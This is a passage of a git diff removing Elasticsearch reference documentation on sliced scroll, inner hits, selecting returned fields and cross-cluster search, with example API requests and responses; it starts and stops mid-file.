/my-index-000001/_search?scroll=1m -{ - "slice": { - "id": 0, <1> - "max": 2 <2> - }, - "query": { - "match": { - "message": "foo" - } - } -} -GET /my-index-000001/_search?scroll=1m -{ - "slice": { - "id": 1, - "max": 2 - }, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -<1> The id of the slice -<2> The maximum number of slices - -The result from the first request returned documents that belong to the first slice (id: 0) and the result from the -second request returned documents that belong to the second slice. Since the maximum number of slices is set to 2 - the union of the results of the two requests is equivalent to the results of a scroll query without slicing. -By default the splitting is done on the shards first and then locally on each shard using the _id field -with the following formula: -`slice(doc) = floorMod(hashCode(doc._id), max)` -For instance if the number of shards is equal to 2 and the user requested 4 slices then the slices 0 and 2 are assigned -to the first shard and the slices 1 and 3 are assigned to the second shard. - -Each scroll is independent and can be processed in parallel like any scroll request. - -NOTE: If the number of slices is bigger than the number of shards the slice filter is very slow on the first calls, it has a complexity of O(N) and a memory cost equals -to N bits per slice where N is the total number of documents in the shard. -After few calls the filter should be cached and subsequent calls should be faster but you should limit the number of - sliced query you perform in parallel to avoid the memory explosion. - -To avoid this cost entirely it is possible to use the `doc_values` of another field to do the slicing -but the user must ensure that the field has the following properties: - - * The field is numeric. - - * `doc_values` are enabled on that field - - * Every document should contain a single value. If a document has multiple values for the specified field, the first value is used. - - * The value for each document should be set once when the document is created and never updated. This ensures that each -slice gets deterministic results. - - * The cardinality of the field should be high. This ensures that each slice gets approximately the same amount of documents. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search?scroll=1m -{ - "slice": { - "field": "@timestamp", - "id": 0, - "max": 10 - }, - "query": { - "match": { - "message": "foo" - } - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -For append only time-based indices, the `timestamp` field can be used safely. - -NOTE: By default the maximum number of slices allowed per scroll is limited to 1024. -You can update the `index.max_slices_per_scroll` index setting to bypass this limit. diff --git a/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc b/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc deleted file mode 100644 index ca7e7a81729..00000000000 --- a/docs/reference/search/search-your-data/retrieve-inner-hits.asciidoc +++ /dev/null @@ -1,552 +0,0 @@ -[[inner-hits]] -== Retrieve inner hits - -The <> and <> features allow the return of documents that -have matches in a different scope. In the parent/child case, parent documents are returned based on matches in child -documents or child documents are returned based on matches in parent documents. In the nested case, documents are returned -based on matches in nested inner objects. - -In both cases, the actual matches in the different scopes that caused a document to be returned are hidden. In many cases, -it's very useful to know which inner nested objects (in the case of nested) or children/parent documents (in the case -of parent/child) caused certain information to be returned. The inner hits feature can be used for this. This feature -returns per search hit in the search response additional nested hits that caused a search hit to match in a different scope. - -Inner hits can be used by defining an `inner_hits` definition on a `nested`, `has_child` or `has_parent` query and filter. -The structure looks like this: - -[source,js] --------------------------------------------------- -"" : { - "inner_hits" : { - - } -} --------------------------------------------------- -// NOTCONSOLE - -If `inner_hits` is defined on a query that supports it then each search hit will contain an `inner_hits` json object with the following structure: - -[source,js] --------------------------------------------------- -"hits": [ - { - "_index": ..., - "_type": ..., - "_id": ..., - "inner_hits": { - "": { - "hits": { - "total": ..., - "hits": [ - { - "_type": ..., - "_id": ..., - ... - }, - ... - ] - } - } - }, - ... - }, - ... -] --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[inner-hits-options]] -=== Options - -Inner hits support the following options: - -[horizontal] -`from`:: The offset from where the first hit to fetch for each `inner_hits` in the returned regular search hits. -`size`:: The maximum number of hits to return per `inner_hits`. By default the top three matching hits are returned. -`sort`:: How the inner hits should be sorted per `inner_hits`. By default the hits are sorted by the score. -`name`:: The name to be used for the particular inner hit definition in the response. Useful when multiple inner hits - have been defined in a single search request. The default depends in which query the inner hit is defined. - For `has_child` query and filter this is the child type, `has_parent` query and filter this is the parent type - and the nested query and filter this is the nested path. - -Inner hits also supports the following per document features: - -* <> -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[nested-inner-hits]] -=== Nested inner hits - -The nested `inner_hits` can be used to include nested inner objects as inner hits to a search hit. - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested" - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "number": 1 - }, - { - "author": "nik9000", - "number": 2 - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments", - "query": { - "match": { "comments.number": 2 } - }, - "inner_hits": {} <1> - } - } -} --------------------------------------------------- - -<1> The inner hit definition in the nested query. No other options need to be defined. - -An example of a response snippet that could be generated from the above search request: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": ..., - "inner_hits": { - "comments": { <1> - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1 - }, - "_score": 1.0, - "_source": { - "author": "nik9000", - "number": 2 - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -<1> The name used in the inner hit definition in the search request. A custom key can be used via the `name` option. - -The `_nested` metadata is crucial in the above example, because it defines from what inner nested object this inner hit -came from. The `field` defines the object array field the nested hit is from and the `offset` relative to its location -in the `_source`. Due to sorting and scoring the actual location of the hit objects in the `inner_hits` is usually -different than the location a nested inner object was defined. - -By default the `_source` is returned also for the hit objects in `inner_hits`, but this can be changed. Either via -`_source` filtering feature part of the source can be returned or be disabled. If stored fields are defined on the -nested level these can also be returned via the `fields` feature. - -An important default is that the `_source` returned in hits inside `inner_hits` is relative to the `_nested` metadata. -So in the above example only the comment part is returned per nested hit and not the entire source of the top level -document that contained the comment. - -[discrete] -[[nested-inner-hits-source]] -==== Nested inner hits and +_source+ - -Nested document don't have a `_source` field, because the entire source of document is stored with the root document under -its `_source` field. To include the source of just the nested document, the source of the root document is parsed and just -the relevant bit for the nested document is included as source in the inner hit. Doing this for each matching nested document -has an impact on the time it takes to execute the entire search request, especially when `size` and the inner hits' `size` -are set higher than the default. To avoid the relatively expensive source extraction for nested inner hits, one can disable -including the source and solely rely on doc values fields. Like this: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested" - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "text": "comment text" - }, - { - "author": "nik9000", - "text": "words words words" - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments", - "query": { - "match": { "comments.text": "words" } - }, - "inner_hits": { - "_source": false, - "docvalue_fields": [ - "comments.text.keyword" - ] - } - } - } -} --------------------------------------------------- - -//// - -Response not included in text but tested for completeness sake. - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0444684, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0444684, - "_source": ..., - "inner_hits": { - "comments": { <1> - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0444684, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1 - }, - "_score": 1.0444684, - "fields": { - "comments.text.keyword": [ - "words words words" - ] - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -//// - -[discrete] -[[hierarchical-nested-inner-hits]] -=== Hierarchical levels of nested object fields and inner hits. - -If a mapping has multiple levels of hierarchical nested object fields each level can be accessed via dot notated path. -For example if there is a `comments` nested field that contains a `votes` nested field and votes should directly be returned -with the root hits then the following path can be defined: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "comments": { - "type": "nested", - "properties": { - "votes": { - "type": "nested" - } - } - } - } - } -} - -PUT test/_doc/1?refresh -{ - "title": "Test title", - "comments": [ - { - "author": "kimchy", - "text": "comment text", - "votes": [] - }, - { - "author": "nik9000", - "text": "words words words", - "votes": [ - {"value": 1 , "voter": "kimchy"}, - {"value": -1, "voter": "other"} - ] - } - ] -} - -POST test/_search -{ - "query": { - "nested": { - "path": "comments.votes", - "query": { - "match": { - "comments.votes.voter": "kimchy" - } - }, - "inner_hits" : {} - } - } -} --------------------------------------------------- - -Which would look like: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.6931471, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 0.6931471, - "_source": ..., - "inner_hits": { - "comments.votes": { <1> - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 0.6931471, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_nested": { - "field": "comments", - "offset": 1, - "_nested": { - "field": "votes", - "offset": 0 - } - }, - "_score": 0.6931471, - "_source": { - "value": 1, - "voter": "kimchy" - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] - -This indirect referencing is only supported for nested inner hits. - -[discrete] -[[parent-child-inner-hits]] -=== Parent/child inner hits - -The parent/child `inner_hits` can be used to include parent or child: - -[source,console] --------------------------------------------------- -PUT test -{ - "mappings": { - "properties": { - "my_join_field": { - "type": "join", - "relations": { - "my_parent": "my_child" - } - } - } - } -} - -PUT test/_doc/1?refresh -{ - "number": 1, - "my_join_field": "my_parent" -} - -PUT test/_doc/2?routing=1&refresh -{ - "number": 1, - "my_join_field": { - "name": "my_child", - "parent": "1" - } -} - -POST test/_search -{ - "query": { - "has_child": { - "type": "my_child", - "query": { - "match": { - "number": 1 - } - }, - "inner_hits": {} <1> - } - } -} --------------------------------------------------- - -<1> The inner hit definition like in the nested example. - -An example of a response snippet that could be generated from the above search request: - -[source,console-result] --------------------------------------------------- -{ - ..., - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_score": 1.0, - "_source": { - "number": 1, - "my_join_field": "my_parent" - }, - "inner_hits": { - "my_child": { - "hits": { - "total": { - "value": 1, - "relation": "eq" - }, - "max_score": 1.0, - "hits": [ - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_score": 1.0, - "_routing": "1", - "_source": { - "number": 1, - "my_join_field": { - "name": "my_child", - "parent": "1" - } - } - } - ] - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_source": \.\.\./"_source": $body.hits.hits.0._source/] -// TESTRESPONSE[s/\.\.\./"timed_out": false, "took": $body.took, "_shards": $body._shards/] diff --git a/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc b/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc deleted file mode 100644 index ee4a90c4507..00000000000 --- a/docs/reference/search/search-your-data/retrieve-selected-fields.asciidoc +++ /dev/null @@ -1,456 +0,0 @@ -[[search-fields]] -== Retrieve selected fields from a search -++++ -Retrieve selected fields -++++ - -By default, each hit in the search response includes the document -<>, which is the entire JSON object that was -provided when indexing the document. To retrieve specific fields in the search -response, you can use the `fields` parameter: - -[source,console] ----- -POST my-index-000001/_search -{ - "query": { - "match": { - "message": "foo" - } - }, - "fields": ["user.id", "@timestamp"], - "_source": false -} ----- -// TEST[setup:my_index] - -The `fields` parameter consults both a document's `_source` and the index -mappings to load and return values. Because it makes use of the mappings, -`fields` has some advantages over referencing the `_source` directly: it -accepts <> and <>, and -also formats field values like dates in a consistent way. - -A document's `_source` is stored as a single field in Lucene. So the whole -`_source` object must be loaded and parsed even if only a small number of -fields are requested. To avoid this limitation, you can try another option for -loading fields: - -* Use the <> -parameter to get values for selected fields. This can be a good -choice when returning a fairly small number of fields that support doc values, -such as keywords and dates. -* Use the <> parameter to -get the values for specific stored fields (fields that use the -<> mapping option). - -If needed, you can use the <> parameter to -transform field values in the response using a script. However, scripts can’t -make use of {es}'s index structures or related optimizations. This can sometimes -result in slower search speeds. - -You can find more detailed information on each of these methods in the -following sections: - -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-fields-param]] -=== Fields -beta::[] - -The `fields` parameter allows for retrieving a list of document fields in -the search response. It consults both the document `_source` and the index -mappings to return each value in a standardized way that matches its mapping -type. By default, date fields are formatted according to the -<> parameter in their mappings. - -The following search request uses the `fields` parameter to retrieve values -for the `user.id` field, all fields starting with `http.response.`, and the -`@timestamp` field: - -[source,console] ----- -POST my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "fields": [ - "user.id", - "http.response.*", <1> - { - "field": "@timestamp", - "format": "epoch_millis" <2> - } - ], - "_source": false -} ----- -// TEST[setup:my_index] - -<1> Both full field names and wildcard patterns are accepted. -<2> Using object notation, you can pass a `format` parameter to apply a custom - format for the field's values. The date fields - <> and <> accept a - <>. <> - accept either `geojson` for http://www.geojson.org[GeoJSON] (the default) - or `wkt` for - {wikipedia}/Well-known_text_representation_of_geometry[Well Known Text]. - Other field types do not support the `format` parameter. - -The values are returned as a flat list in the `fields` section in each hit: - -[source,console-result] ----- -{ - "took" : 2, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my-index-000001", - "_id" : "0", - "_score" : 1.0, - "_type" : "_doc", - "fields" : { - "user.id" : [ - "kimchy" - ], - "@timestamp" : [ - "4098435132000" - ], - "http.response.bytes": [ - 1070000 - ], - "http.response.status_code": [ - 200 - ] - } - } - ] - } -} ----- -// TESTRESPONSE[s/"took" : 2/"took": $body.took/] -// TESTRESPONSE[s/"max_score" : 1.0/"max_score" : $body.hits.max_score/] -// TESTRESPONSE[s/"_score" : 1.0/"_score" : $body.hits.hits.0._score/] - -Only leaf fields are returned -- `fields` does not allow for fetching entire -objects. - -The `fields` parameter handles field types like <> and -<> whose values aren't always present in -the `_source`. Other mapping options are also respected, including -<>, <> and -<>. - -NOTE: The `fields` response always returns an array of values for each field, -even when there is a single value in the `_source`. This is because {es} has -no dedicated array type, and any field could contain multiple values. The -`fields` parameter also does not guarantee that array values are returned in -a specific order. See the mapping documentation on <> for more -background. - - - -[discrete] -[[docvalue-fields]] -=== Doc value fields - -You can use the <> parameter to return -<> for one or more fields in the search response. - -Doc values store the same values as the `_source` but in an on-disk, -column-based structure that's optimized for sorting and aggregations. Since each -field is stored separately, {es} only reads the field values that were requested -and can avoid loading the whole document `_source`. - -Doc values are stored for supported fields by default. However, doc values are -not supported for <> or -{plugins}/mapper-annotated-text-usage.html[`text_annotated`] fields. - -The following search request uses the `docvalue_fields` parameter to retrieve -doc values for the `user.id` field, all fields starting with `http.response.`, and the -`@timestamp` field: - -[source,console] ----- -GET my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "docvalue_fields": [ - "user.id", - "http.response.*", <1> - { - "field": "date", - "format": "epoch_millis" <2> - } - ] -} ----- -// TEST[setup:my_index] - -<1> Both full field names and wildcard patterns are accepted. -<2> Using object notation, you can pass a `format` parameter to apply a custom - format for the field's doc values. <> support a - <>. <> support a - https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html[DecimalFormat - pattern]. Other field datatypes do not support the `format` parameter. - -TIP: You cannot use the `docvalue_fields` parameter to retrieve doc values for -nested objects. If you specify a nested object, the search returns an empty -array (`[ ]`) for the field. To access nested fields, use the -<> parameter's `docvalue_fields` -property. - -[discrete] -[[stored-fields]] -=== Stored fields - -It's also possible to store an individual field's values by using the -<> mapping option. You can use the -`stored_fields` parameter to include these stored values in the search response. - -WARNING: The `stored_fields` parameter is for fields that are explicitly marked as -stored in the mapping, which is off by default and generally not recommended. -Use <> instead to select -subsets of the original source document to be returned. - -Allows to selectively load specific stored fields for each document represented -by a search hit. - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields" : ["user", "postDate"], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -`*` can be used to load all stored fields from the document. - -An empty array will cause only the `_id` and `_type` for each hit to be -returned, for example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields" : [], - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -If the requested fields are not stored (`store` mapping set to `false`), they will be ignored. - -Stored field values fetched from the document itself are always returned as an array. On the contrary, metadata fields like `_routing` are never returned as an array. - -Also only leaf fields can be returned via the `stored_fields` option. If an object field is specified, it will be ignored. - -NOTE: On its own, `stored_fields` cannot be used to load fields in nested -objects -- if a field contains a nested object in its path, then no data will -be returned for that stored field. To access nested fields, `stored_fields` -must be used within an <> block. - -[discrete] -[[disable-stored-fields]] -==== Disable stored fields - -To disable the stored fields (and metadata fields) entirely use: `_none_`: - -[source,console] --------------------------------------------------- -GET /_search -{ - "stored_fields": "_none_", - "query" : { - "term" : { "user" : "kimchy" } - } -} --------------------------------------------------- - -NOTE: <> and <> parameters cannot be activated if `_none_` is used. - -[discrete] -[[source-filtering]] -=== Source filtering - -You can use the `_source` parameter to select what fields of the source are -returned. This is called _source filtering_. - -The following search API request sets the `_source` request body parameter to -`false`. The document source is not included in the response. - -[source,console] ----- -GET /_search -{ - "_source": false, - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -To return only a subset of source fields, specify a wildcard (`*`) pattern in -the `_source` parameter. The following search API request returns the source for -only the `obj` field and its properties. - -[source,console] ----- -GET /_search -{ - "_source": "obj.*", - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -You can also specify an array of wildcard patterns in the `_source` field. The -following search API request returns the source for only the `obj1` and -`obj2` fields and their properties. - -[source,console] ----- -GET /_search -{ - "_source": [ "obj1.*", "obj2.*" ], - "query": { - "match": { - "user.id": "kimchy" - } - } -} ----- - -For finer control, you can specify an object containing arrays of `includes` and -`excludes` patterns in the `_source` parameter. - -If the `includes` property is specified, only source fields that match one of -its patterns are returned. You can exclude fields from this subset using the -`excludes` property. - -If the `includes` property is not specified, the entire document source is -returned, excluding any fields that match a pattern in the `excludes` property. - -The following search API request returns the source for only the `obj1` and -`obj2` fields and their properties, excluding any child `description` fields. - -[source,console] ----- -GET /_search -{ - "_source": { - "includes": [ "obj1.*", "obj2.*" ], - "excludes": [ "*.description" ] - }, - "query": { - "term": { - "user.id": "kimchy" - } - } -} ----- - -[discrete] -[[script-fields]] -=== Script fields - -You can use the `script_fields` parameter to retrieve a <> (based on different fields) for each hit. For example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "test1": { - "script": { - "lang": "painless", - "source": "doc['price'].value * 2" - } - }, - "test2": { - "script": { - "lang": "painless", - "source": "doc['price'].value * params.factor", - "params": { - "factor": 2.0 - } - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Script fields can work on fields that are not stored (`price` in -the above case), and allow to return custom values to be returned (the -evaluated value of the script). - -Script fields can also access the actual `_source` document and -extract specific elements to be returned from it by using `params['_source']`. -Here is an example: - -[source,console] --------------------------------------------------- -GET /_search - { - "query" : { - "match_all": {} - }, - "script_fields" : { - "test1" : { - "script" : "params['_source']['message']" - } - } - } --------------------------------------------------- -// TEST[setup:my_index] - -Note the `_source` keyword here to navigate the json-like model. - -It's important to understand the difference between -`doc['my_field'].value` and `params['_source']['my_field']`. The first, -using the doc keyword, will cause the terms for that field to be loaded to -memory (cached), which will result in faster execution, but more memory -consumption. Also, the `doc[...]` notation only allows for simple valued -fields (you can't return a json object from it) and makes sense only for -non-analyzed or single term based fields. However, using `doc` is -still the recommended way to access values from the document, if at all -possible, because `_source` must be loaded and parsed every time it's used. -Using `_source` is very slow. diff --git a/docs/reference/search/search-your-data/search-across-clusters.asciidoc b/docs/reference/search/search-your-data/search-across-clusters.asciidoc deleted file mode 100644 index 9020787cfa8..00000000000 --- a/docs/reference/search/search-your-data/search-across-clusters.asciidoc +++ /dev/null @@ -1,422 +0,0 @@ -[[modules-cross-cluster-search]] -== Search across clusters - -*{ccs-cap}* lets you run a single search request against one or more -<>. For example, you can use a {ccs} to -filter and analyze log data stored on clusters in different data centers. - -IMPORTANT: {ccs-cap} requires <>. - -[discrete] -[[ccs-supported-apis]] -=== Supported APIs - -The following APIs support {ccs}: - -* <> -* <> -* <> -* <> - -[discrete] -[[ccs-example]] -=== {ccs-cap} examples - -[discrete] -[[ccs-remote-cluster-setup]] -==== Remote cluster setup - -To perform a {ccs}, you must have at least one remote cluster configured. - -The following <> API request -adds three remote clusters:`cluster_one`, `cluster_two`, and `cluster_three`. - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster": { - "remote": { - "cluster_one": { - "seeds": [ - "127.0.0.1:9300" - ] - }, - "cluster_two": { - "seeds": [ - "127.0.0.1:9301" - ] - }, - "cluster_three": { - "seeds": [ - "127.0.0.1:9302" - ] - } - } - } - } -} --------------------------------- -// TEST[setup:host] -// TEST[s/127.0.0.1:930\d+/\${transport_host}/] - -[discrete] -[[ccs-search-remote-cluster]] -==== Search a single remote cluster - -The following <> API request searches the -`my-index-000001` index on a single remote cluster, `cluster_one`. - -[source,console] --------------------------------------------------- -GET /cluster_one:my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "_source": ["user.id", "message", "http.response.status_code"] -} --------------------------------------------------- -// TEST[continued] -// TEST[setup:my_index] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 150, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "failed": 0, - "skipped": 0 - }, - "_clusters": { - "total": 1, - "successful": 1, - "skipped": 0 - }, - "hits": { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "cluster_one:my-index-000001", <1> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 150/"took": "$body.took"/] -// TESTRESPONSE[s/"max_score": 1/"max_score": "$body.hits.max_score"/] -// TESTRESPONSE[s/"_score": 1/"_score": "$body.hits.hits.0._score"/] - -<1> The search response body includes the name of the remote cluster in the -`_index` parameter. - -[discrete] -[[ccs-search-multi-remote-cluster]] -==== Search multiple remote clusters - -The following <> API request searches the `my-index-000001` index on -three clusters: - -* Your local cluster -* Two remote clusters, `cluster_one` and `cluster_two` - -[source,console] --------------------------------------------------- -GET /my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001/_search -{ - "query": { - "match": { - "user.id": "kimchy" - } - }, - "_source": ["user.id", "message", "http.response.status_code"] -} --------------------------------------------------- -// TEST[continued] - -The API returns the following response: - -[source,console-result] --------------------------------------------------- -{ - "took": 150, - "timed_out": false, - "num_reduce_phases": 4, - "_shards": { - "total": 3, - "successful": 3, - "failed": 0, - "skipped": 0 - }, - "_clusters": { - "total": 3, - "successful": 3, - "skipped": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": 1, - "hits": [ - { - "_index": "my-index-000001", <1> - "_type": "_doc", - "_id": "0", - "_score": 2, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - }, - { - "_index": "cluster_one:my-index-000001", <2> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - }, - { - "_index": "cluster_two:my-index-000001", <3> - "_type": "_doc", - "_id": "0", - "_score": 1, - "_source": { - "user": { - "id": "kimchy" - }, - "message": "GET /search HTTP/1.1 200 1070000", - "http": { - "response": - { - "status_code": 200 - } - } - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took": 150/"took": "$body.took"/] -// TESTRESPONSE[s/"max_score": 1/"max_score": "$body.hits.max_score"/] -// TESTRESPONSE[s/"_score": 1/"_score": "$body.hits.hits.0._score"/] -// TESTRESPONSE[s/"_score": 2/"_score": "$body.hits.hits.1._score"/] - -<1> This document's `_index` parameter doesn't include a cluster name. This -means the document came from the local cluster. -<2> This document came from `cluster_one`. -<3> This document came from `cluster_two`. - -[discrete] -[[skip-unavailable-clusters]] -=== Skip unavailable clusters - -By default, a {ccs} returns an error if *any* cluster in the request is -unavailable. - -To skip an unavailable cluster during a {ccs}, set the -<> cluster setting to `true`. - -The following <> API request -changes `cluster_two`'s `skip_unavailable` setting to `true`. - -[source,console] --------------------------------- -PUT _cluster/settings -{ - "persistent": { - "cluster.remote.cluster_two.skip_unavailable": true - } -} --------------------------------- -// TEST[continued] - -If `cluster_two` is disconnected or unavailable during a {ccs}, {es} won't -include matching documents from that cluster in the final results. - -[discrete] -[[ccs-gateway-seed-nodes]] -=== Selecting gateway and seed nodes in sniff mode - -For remote clusters using the <> mode, gateway and -seed nodes need to be accessible from the local cluster via your network. - -By default, any non-<> node can act as a -gateway node. If wanted, you can define the gateway nodes for a cluster by -setting `cluster.remote.node.attr.gateway` to `true`. - -For {ccs}, we recommend you use gateway nodes that are capable of serving as -<> for search requests. If -wanted, the seed nodes for a cluster can be a subset of these gateway nodes. - -[discrete] -[[ccs-proxy-mode]] -=== {ccs-cap} in proxy mode - -<> remote cluster connections support {ccs}. All remote -connections connect to the configured `proxy_address`. Any desired connection -routing to gateway or <> must -be implemented by the intermediate proxy at this configured address. - -[discrete] -[[ccs-network-delays]] -=== How {ccs} handles network delays - -Because {ccs} involves sending requests to remote clusters, any network delays -can impact search speed. To avoid slow searches, {ccs} offers two options for -handling network delays: - -<>:: -By default, {es} reduces the number of network roundtrips between remote -clusters. This reduces the impact of network delays on search speed. However, -{es} can't reduce network roundtrips for large search requests, such as those -including a <> or -<>. -+ -See <> to learn how this option works. - -<>:: For search -requests that include a scroll or inner hits, {es} sends multiple outgoing and -ingoing requests to each remote cluster. You can also choose this option by -setting the <> parameter to -`false`. While typically slower, this approach may work well for networks with -low latency. -+ -See <> to learn how this option works. - -[discrete] -[[ccs-min-roundtrips]] -==== Minimize network roundtrips - -Here's how {ccs} works when you minimize network roundtrips. - -. You send a {ccs} request to your local cluster. A coordinating node in that -cluster receives and parses the request. -+ -image:images/ccs/ccs-min-roundtrip-client-request.svg[] - -. The coordinating node sends a single search request to each cluster, including -the local cluster. Each cluster performs the search request independently, -applying its own cluster-level settings to the request. -+ -image:images/ccs/ccs-min-roundtrip-cluster-search.svg[] - -. Each remote cluster sends its search results back to the coordinating node. -+ -image:images/ccs/ccs-min-roundtrip-cluster-results.svg[] - -. After collecting results from each cluster, the coordinating node returns the -final results in the {ccs} response. -+ -image:images/ccs/ccs-min-roundtrip-client-response.svg[] - -[discrete] -[[ccs-unmin-roundtrips]] -==== Don't minimize network roundtrips - -Here's how {ccs} works when you don't minimize network roundtrips. - -. You send a {ccs} request to your local cluster. A coordinating node in that -cluster receives and parses the request. -+ -image:images/ccs/ccs-min-roundtrip-client-request.svg[] - -. The coordinating node sends a <> API request to -each remote cluster. -+ -image:images/ccs/ccs-min-roundtrip-cluster-search.svg[] - -. Each remote cluster sends its response back to the coordinating node. -This response contains information about the indices and shards the {ccs} -request will be executed on. -+ -image:images/ccs/ccs-min-roundtrip-cluster-results.svg[] - -. The coordinating node sends a search request to each shard, including those in -its own cluster. Each shard performs the search request independently. -+ -[WARNING] -==== -When network roundtrips aren't minimized, the search is executed as if all data -were in the coordinating node's cluster. We recommend updating cluster-level -settings that limit searches, such as `action.search.shard_count.limit`, -`pre_filter_shard_size`, and `max_concurrent_shard_requests`, to account for -this. If these limits are too low, the search may be rejected. -==== -+ -image:images/ccs/ccs-dont-min-roundtrip-shard-search.svg[] - -. Each shard sends its search results back to the coordinating node. -+ -image:images/ccs/ccs-dont-min-roundtrip-shard-results.svg[] - -. After collecting results from each cluster, the coordinating node returns the -final results in the {ccs} response. -+ -image:images/ccs/ccs-min-roundtrip-client-response.svg[] - -[discrete] -[[ccs-supported-configurations]] -=== Supported configurations - -Generally, <> can search remote -clusters that are one major version ahead or behind the coordinating node's -version. Cross cluster search can also search remote clusters that are being -<> so long as both the "upgrade from" and -"upgrade to" version are compatible with the gateway node. - -For example, a coordinating node running {es} 5.6 can search a remote cluster -running {es} 6.8, but that cluster can not be upgraded to 7.1. In this case -you should first upgrade the coordinating node to 7.1 and then upgrade remote -cluster. - -WARNING: Running multiple versions of {es} in the same cluster beyond the -duration of an upgrade is not supported. diff --git a/docs/reference/search/search-your-data/search-multiple-indices.asciidoc b/docs/reference/search/search-your-data/search-multiple-indices.asciidoc deleted file mode 100644 index 473028b0dec..00000000000 --- a/docs/reference/search/search-your-data/search-multiple-indices.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[search-multiple-indices]] -== Search multiple data streams and indices - -To search multiple data streams and indices, add them as comma-separated values -in the <>'s request path. - -The following request searches the `my-index-000001` and `my-index-000002` -indices. - -[source,console] ----- -GET 